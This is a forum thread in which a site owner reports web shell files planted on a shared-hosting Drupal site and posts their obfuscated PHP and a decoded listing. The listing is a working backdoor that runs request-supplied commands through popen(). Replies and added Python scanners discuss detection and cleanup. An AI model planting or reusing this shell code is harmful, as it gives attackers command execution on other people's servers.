On one of my websites there have been several files, with identical content but different names, appearing in several locations throughout the installation. I verified my local files; those particular files are not present, so I know I have not uploaded them.

The files have names like

  • bash.php
  • chklist.php
  • lasticon.php
  • letter.php
  • MRTG.php
  • Nagios.php
  • radusers.php
  • reminders.php
  • shoppers.php
  • toupper.php

The contents of the files are all identical and look like this:

<?php
  define('HELP_VERSION', '1.9');
  eval(gzinflate(base64_decode('hZFPa8JAEMXv+RRjEBIP1awxVdpNwFIhhx6C1eYgRTbZkSwkseyutLb63Zs/Fnto6F4W3vvNm9nZ/htT6p2DD0xKdrQtxgtRWuAHYE3dBPnYJR5JZ5Ox4916STJxp45LXMZ2nFiDe8MQO7B7QinUdn/7vFi+LJYbKwqj7Xy9CrfrSrFeB3A6GVCdbjCK/8Da2TadudeK/1Ho+VBwr7P3AL6qpAwZR2lbcRzfzA86w1KLlGm8gwemRAoSWV74Zrh4ioAMZ2a9gmtVuFpFIzJ0YOIQWJesCthL8Ym8xfrsV2K9ci0PWBuYZnswaaaLPKB1WEC10DkG8zRFpeARS4GcjlqRjlokIz8+v/iVQjMZ0GTPjxV2uZpYs+nzIbTt1L92BswVNk/umOpsfAM=')));
  header('Content-Type: text/html; charset=UTF-8');
  echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <title>HELP <?php echo HELP_VERSION ?></title>
</head>
<body>

<h3>HELP <?php echo HELP_VERSION ?></h3>

<?php
  error_reporting (E_ALL);
  eval(gzinflate(base64_decode('dZLLboMwEEX3fMVUsmLTVH1sQairfEBfK8tBBJzE4lVhJFpV/HttsAkkZoPMnPHx9QDq6iaPM9FABLz8bn8Jit93b1+7j0+KLcPMh1fAGAJw0tBDaV2WSZWBS2OYtjg0E1WWQpxFCeC0DGxwuCyGKkeb5Id6xTGwVYehyiHbjDeN2zGyUXLrsDT0PE8cgaBpvneRavbhzwMYgJ3YrD4S3vATwXtKg0ORVHnA2H2azd62hO5DtvURfgBrUSu1S/rWY87QNfrC6DODSB3zhC8cAFW8M1/eNoYG9sALyVd6pxs9aqN63uyeRTiKgsf8R8hWEivxYbMBIfXyUlskm/2UtuFaPs1Pj2+EGvVe7xy8PnKRxeJFmKk4pknPy2qo5fNwJ96mXUYU+Ac=')));
?>

<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory:
<b>
<?php
eval(gzinflate(base64_decode('bZDLboMwEEX3fMUUGdlWUJyueWSVqosuIip1EyFEwQirBFu2UVtV+fcaUoqi4I1f9945M+hT6o+iFrowqhPW8hoS4F+qkzUnmOEQzPBurCZoFobwSGnkebxqJeC4hFbzJvExbAEVr4fs7ZCd8PH56M4vTzh3z3g/exPmp5mUNmZlyrALEQ2QB35W9nsp8E9y2uWUwo8HgFRpWweGnQegkRoIEu6+i8DtMVRy6O1KAh3/N5tryByzdTlswr2viEQeTVKlRW8bsvQXmKWLwPhpYK5NhJP8b60N4EYw6I731TjbiYXeuld56Ah08S7eLw==')));
?></b>
</p>
<p>
    EXEC: <input type="text" name="takbo" value="<?PHP echo $takbo ?>" size="20" />
    PASS: <input type="password" name="lihim" value="<?PHP echo $lihim ?>" size="20" />
    Choose new working directory:
    <select name="work_dir" onchange="this.form.submit()">
<?php
  eval(gzinflate(base64_decode('jVLBboQgEL3zFRNioiYb6Z5dvbQf0A8wMVankZSAAd1N0/jvBZS6bZqwFxjePN68YUgGrtuxk4NAqEBNKC2QJTelP1ob5SUht5HbZJbYo6Vo7AZPOS7mOXwRAP4OGTdtSO7ohm+XK0iLNMAA2I8K6EVNM1cSrp1YsGroT+2GgkGB/YyDhUPY0Pp50RrlDC9cW0jpzwvbNOpG0tKLr4DC4O/KW+m9tkuZWQuUd8063vnwd4hYpp6UOagnSFnq+U+xfph1/NrFDIdqETFagPOC18wsbzZyzvbNgUcrJ6CM2vVsx1DQRy2Qf4z4Rwy6/iXZ3QyjU0z8JGu3PdB1VI7F9EhYV7KSXiiDf39rSb4B')));
?>

</select></p>
<p>
Command: <input type="text" name="command" size="60" />
Enable <code>stderr

-trapping?
if ($stderr) echo "checked=\"checked\""; />

Output

  eval(gzinflate(base64_decode('dVJda4MwFH3vr7gVaRRst5YxBmJhjPVtHw/ds7h4nbJ8SBLXldH/vlSjtqN7MJiTc889JzdFI6ippABdImMpfiNdBT7lefgzAagKCKbIa7PvsBYE8IsaEqhljaLFI095YdwedQRLUagbZizN82KH7cqKYTAtUBaBlbBqjrVICoVZfgSj5fXqJowPrqSmTGps2Z3K8eD4KTSNEkCl+EJlUrpXqTaqEh+B04y83Iu83dHXYTI5CyI5z4QNA31EX5sclQqde9/wurBWrXlja0TGA3JlMRIB0ajTW0Wcm14LFjYnrMfK1Xq2jIFmZoBiUHzYtFdyAGQa2/69TJIAYZoMRk7kCcw3JHbp/4zGZJ/vMoTZDHqEVWXFw0GH74cO0LFhYQ17du2o3fYf+aH6kqC11iiGgsocx7sd81204H5P+iEtJZSGM10jrTJGy0zp4OxRjjYieHzepg8vT6/3WzuTt+1mfkfaQf8C')));


document.forms[0].command.focus();



I'm not sure where those files came from nor what they do, but this doesn't really look good. I'm wondering if my server may have been compromised. I informed my host and they are still investigating this yet they believe those files are legit and part of a monitoring application they use.

I ran some portions of the file through a decoder and this comes out:

<?php
  define('HELP_VERSION', '1.9');
  $passwd = array('admin' => 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != md5($_SERVER['PHP_AUTH_PW']))
  { 
    header('WWW-Authenticate: Basic realm="HELP 1.8"');
    header('HTTP/1.0 401 Unauthorized');
    $authenticated = true;
    echo "<html><head><title>Access Denied</title></head><h1>Access denied</h1><hr><body></body></html>";
    exit(0);
  } 
  else
  {
    $authenticated = true;
  }
  header('Content-Type: text/html; charset=UTF-8');
  echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <title>HELP <?php echo HELP_VERSION ?></title>
</head>
<body>

<h3>HELP <?php echo HELP_VERSION ?></h3>

<?php
  error_reporting (E_ALL);
  $work_dir = empty($_REQUEST['work_dir']) ? '' : $_REQUEST['work_dir'];
  $command  = empty($_REQUEST['command'])  ? '' : $_REQUEST['command'];
  $lihim    = empty($_REQUEST['lihim'])    ? '' : $_REQUEST['lihim'];
  $takbo    = empty($_REQUEST['takbo'])    ? '' : $_REQUEST['takbo'];
  $stderr   = empty($_REQUEST['stderr'])   ? '' : $_REQUEST['stderr'];
  if ($work_dir != '') {
    if ($command != '') {
      if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { 
        if ($regs[1][0] == '/') {
          $new_dir = $regs[1];
        } 
        else {
          $new_dir = $work_dir . '/' . $regs[1];
        }
        if (file_exists($new_dir) && is_dir($new_dir)) {
          $work_dir = $new_dir;
        }
        $command = '';
      }
    }
  }
  if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
    chdir($work_dir);
  }
  $work_dir = getcwd();
?>

<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory:
<b>
<?php
  $work_dir_splitted = explode('/', substr($work_dir, 1));
  echo '<a href="' . $_SERVER['PHP_SELF'] . '?work_dir=/">Root</a>/';
  if (!empty($work_dir_splitted[0])) {
    $path = '';
    for ($i = 0; $i < count($work_dir_splitted); $i++) {
      $path .= '/' . $work_dir_splitted[$i];
      printf('<a href="%s?work_dir=%s">%s</a>/', $_SERVER['PHP_SELF'], urlencode($path), $work_dir_splitted[$i]);
    }
  }
?>
</b>
</p>
<p>
    EXEC: <input type="text" name="takbo" value="<?PHP echo $takbo ?>" size="20" />
    PASS: <input type="password" name="lihim" value="<?PHP echo $lihim ?>" size="20" />
    Choose new working directory:
    <select name="work_dir" onchange="this.form.submit()">
<?php
    $dir_handle = opendir($work_dir);
    while ($dir = readdir($dir_handle)) {
      if (is_dir($dir)) {
        if ($dir == '.') {
          echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
        }
        elseif ($dir == '..') {
          if (strlen($work_dir) == 1) {
          }
          elseif (strrpos($work_dir, '/') == 0) {
            echo "<option value=\"/\">Parent Directory</option>\n";
          }
          else {
            echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
          }
        }
        else {
          if ($work_dir == '/') {
            echo "<option value=\"$work_dir$dir\">$dir</option>\n";
          }
          else {
            echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
          }
        }
      }
    }
    closedir($dir_handle);
?>

</select></p>
<p>
Command: <input type="text" name="command" size="60" />
Enable <code>stderr

-trapping?
if ($stderr) echo "checked=\"checked\""; />

Output

  function shell_exec2($cmd) {
    if (!empty($cmd)){
      $fp = popen($cmd,"r"); {
        $result = "";
        while(!feof($fp)){
          $result.=fread($fp,1024);
        }
        pclose($fp);
      }
    }
    return convert_cyr_string($result,"d","w");
  }
  if (!empty($command)) {
    if ($stderr) {
      $tmpfile = tempnam('/tmp', 'ses_6r');
      $command .= " > $tmpfile 2>&1; cat $tmpfile; rm $tmpfile";
    }
    elseif ($command == 'ls') {
      $command .= ' -F';
    }
    if (!empty($takbo) && !empty($lihim)) {
      $mycommand = $takbo . " " . $lihim . " ";
    }
    if (!empty($mycommand)) {
      $mycommand .= urlencode($command);
    }
    else {
      $mycommand = $command;
    }
    echo htmlspecialchars(shell_exec2($mycommand), ENT_COMPAT, 'UTF-8');}


document.forms[0].command.focus();
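The check the poster did by hand (comparing the deployed tree against the local copy and looking for files that should not be there) can be automated. The following is an added example and not code from the thread: it hashes a trusted copy into a manifest, walks the deployed web root, and reports files that are unknown, modified or missing, plus any PHP file carrying the `eval(gzinflate(base64_decode(` chain seen in the posted files. The directory layout, file names and contents in `demo()` are constructed for the demonstration; the planted file is placed in a theme image folder, which is where a later reply in this thread says such files turned up.

```python
"""Integrity and obfuscation scan for a PHP web root.

Added example (not from the original thread). Compares a deployed tree
against a manifest built from a trusted copy and flags files that match
the eval/gzinflate/base64_decode pattern of the posted web shell.
Everything written to disk below is constructed sample data.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List
import re

# A match is a flag for manual review, not proof of compromise.
OBFUSCATION_RE = re.compile(
    rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".phtml"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Hash every file under a trusted copy (for example the local checkout)."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def scan_webroot(root: Path, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a deployed tree against the manifest and look for obfuscated PHP."""
    findings: Dict[str, List[str]] = {"unknown": [], "modified": [], "obfuscated": []}
    seen = set()
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        seen.add(rel)
        if rel not in manifest:
            findings["unknown"].append(rel)
        elif manifest[rel] != sha256_file(p):
            findings["modified"].append(rel)
        if p.suffix.lower() in PHP_SUFFIXES and OBFUSCATION_RE.search(p.read_bytes()):
            findings["obfuscated"].append(rel)
    findings["missing"] = sorted(set(manifest) - seen)
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed tree: one planted dropper in a theme image folder, one edited file."""
    with tempfile.TemporaryDirectory() as tmp:
        trusted = Path(tmp) / "local"
        deployed = Path(tmp) / "deployed"
        for base in (trusted, deployed):
            (base / "themes" / "garland" / "images").mkdir(parents=True)
            (base / "index.php").write_text("<?php echo 'hello'; ?>\n")
            (base / "themes" / "garland" / "images" / "logo.png").write_bytes(b"\x89PNG")
        manifest = build_manifest(trusted)
        # Planted file with the same shape as the posted shell; the blob is a placeholder.
        planted = deployed / "themes" / "garland" / "images" / "lasticon.php"
        planted.write_text("<?php\n  eval(gzinflate(base64_decode('PLACEHOLDER')));\n?>\n")
        # A legitimate file changed in place.
        (deployed / "index.php").write_text("<?php echo 'tampered'; ?>\n")
        return scan_webroot(deployed, manifest)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:10s} {paths}")
```

Run the scan from a separate host or read-only mount where possible, and keep the manifest off the web server: a manifest stored next to the files can be edited by whoever planted them.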



Comments

nevets’s picture

Those are viruses; the fact that they are in the file system suggests either that your file system is generally writable and/or that someone has access to your site through your site's admin login/password, your site's control panel login/password or FTP login/password, so it is suggested you can those and clean up the files.

sevanden’s picture

I am myself pretty convinced this is some sort of malware, possibly a backdoor to gain access to the site/server. The less pretty part is that my hosting provider claims those files are part of a logging tool they use to monitor the websites they host and they believe those files are legit, which I doubt.

I'm actually curious as to what this code really allows someone to do ... Can anyone help out on that aspect?

nevets’s picture

If they are really from the hosting company I would switch hosting companies.

sevanden’s picture

I raised this issue 3 days ago with my hosting company, up until now they are still investigating the matter. It is rather troublesome to say the least ...

I gave them the files, the filenames and even the fully decoded version of the file and still they fail to give a decent response within a reasonable time ...

sevanden’s picture

The permissions on my files and folders are set in such a way that no one has write access. The thing is, those files appear even in directories that are set read only. This site is on shared hosting and the hosting company is still investigating my issue, and they even hired an external security firm to check everything (so they say).

So, I'm pretty sure that it's not a permissions issue or at least not something I can change further than set everything as restrictive as possible.

I'm still curious as to what this piece of code actually allows one to do on a web server. Hope someone can shed some light on this for me ...

danreb’s picture

I think we are hosting on the same server; I've also found some PHP files with the same code you posted above and I've deleted all those files as I think they try to compromise / hack my site.

The PHP files I've found are named:

   - letters.php
   - crond.php
   - checklist.php
   - radwho.php3
   - reminder.php3
   - MRTGS.php
   - hoppers.php
   - poppers.php

They are in the root directory and inside the images folder of Garland and color.module.

I host my site at web.com.ph and I will contact them about these files; it so happens that I was searching Google about that code and it pointed me to this thread.

d8nnii’s picture

I used to have those files when I was using Zen Cart. If you are using cPanel, you need to use your file manager to change the folder (especially image folder) permissions to at least 644. And check your users to ensure that there aren't any uninvited guests as your admins or mods.

I'm still new to Drupal so can't advise much but in Zen Cart, we are advised to change our admin folder directory to something not so obvious. For example:

www.mysite.com/admin

change to

www.mysite.com/nf4r823-9faon-cu30

I did both of these and it doesn't come back anymore. You could also use .htaccess.

sevanden’s picture

My setup has an .htaccess file and all directories were set to read only, all files as well, except for the directory sites/default/files where Drupal writes its temp files, yet those files still appeared at random places in the setup.

The hosting company has finally admitted the server was compromised and is about to move all accounts to a clean server. I just hope that if people made backups of their files they will be smart enough to check whether any of those files are still in there; otherwise we'll be back to square one.

sevanden’s picture

Yes, indeed, we are hosted by the same company. I have raised the issue and tried to make them aware of a possible security breach; however, until now I have not received any confirmation that the issue is fixed. They have, however, responded that they would hire an external security firm to check the whole system; so far it doesn't seem to be resolved.

Those are indeed the files and names that you'll get to see, and even if you remove all write permissions on your directories those files will still appear. There even seems to be a Perl variant of this same script that may pop up in your CGI directory; it's easy to spot as it is a plain text file and differs from the other files you'd normally find there.

I have postponed the further development of my website until I get more information and some kind of confirmation that the issue has been resolved. I don't want to take the risk of putting information of my site's members in the hands of some malicious user.

It would be great if someone could help us understand what those files actually allow to be done; my guess (I'm no expert in PHP or Perl) is that they would allow someone to execute commands on the server...
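The question of what the files allow is answered by the decoded listing earlier in the thread: a `command` taken from the request is passed to `popen()`, so whoever reaches the file can run shell commands as the web server user. The decoding step itself can be done without executing anything, which is safer than the usual trick of swapping `eval` for `echo` in PHP. The following is an added example, not code from the thread: it peels `eval(gzinflate(base64_decode('...')))` layers in Python (PHP's `gzinflate()` is raw DEFLATE, hence `wbits=-15`), rescans until no layer is left, and then lists the execution calls and request variables found in the readable text. The sample in `demo_source()` is constructed here with two nested layers around a two-line fragment modelled on the thread's decoded listing; the real blobs from the posted files are not reproduced.

```python
"""Static unpacking of eval(gzinflate(base64_decode('...'))) layers.

Added example (not from the original thread). Each layer is base64-decoded
and raw-inflated here, the eval() call is replaced by its decoded text, and
the result is rescanned. Nothing in the payload is ever executed.
The sample input is constructed in demo_source() for the demonstration.
"""
import base64
import re
import zlib
from typing import Dict, List, Tuple

# One obfuscation layer as it appears in the posted files.
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]"
    r"\s*\)\s*\)\s*\)\s*;?")

# Calls worth a second look once the text is readable, and the request
# superglobals that feed them (the posted shell uses popen() on $_REQUEST).
EXEC_RE = re.compile(r"\b(popen|proc_open|shell_exec|passthru|system|exec|eval|chdir)\s*\(")
INPUT_RE = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE (no zlib/gzip header): wbits=-15."""
    return zlib.decompress(data, -15)


def peel_layers(source: str, max_rounds: int = 16) -> Tuple[str, int]:
    """Replace every eval(gzinflate(base64_decode(...))) by its payload, repeatedly.

    Returns the fully decoded text and the number of blobs unpacked.
    A malformed blob raises rather than being silently skipped.
    """
    blobs = 0
    for _ in range(max_rounds):
        def unpack(m) -> str:
            return gzinflate(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        source, n = LAYER_RE.subn(unpack, source)
        if n == 0:
            break
        blobs += n
    return source, blobs


def analyze(source: str) -> Dict[str, object]:
    """Decode all layers and summarise what the readable code reaches for."""
    decoded, blobs = peel_layers(source)
    indicators: List[str] = sorted(set(EXEC_RE.findall(decoded)))
    inputs: List[str] = sorted({"$_" + name for name in INPUT_RE.findall(decoded)})
    return {"decoded": decoded, "blobs": blobs, "indicators": indicators, "inputs": inputs}


# --- constructed sample (demo only) ---------------------------------------

def make_layer(php: str) -> str:
    """Wrap PHP text the way the posted files do; used only to build the sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(php.encode("utf-8")) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode("ascii")


def demo_source() -> str:
    """Two nested layers around a fragment modelled on the thread's decoded listing."""
    inner = ("$command = empty($_REQUEST['command']) ? '' : $_REQUEST['command'];\n"
             "  $fp = popen($command, \"r\");\n")
    return "<?php\n  define('HELP_VERSION', '1.9');\n  " + make_layer(make_layer(inner)) + "\n?>\n"


if __name__ == "__main__":
    report = analyze(demo_source())
    print("blobs unpacked:", report["blobs"])
    print("execution calls:", report["indicators"])
    print("request inputs:", report["inputs"])
    print(report["decoded"])
```

Run it against a copy of the suspicious file taken off the server, not on the server itself; the output is plain text to read and to hand to the host, and the same `indicators` list gives a quick triage rule for any other file the integrity check flags.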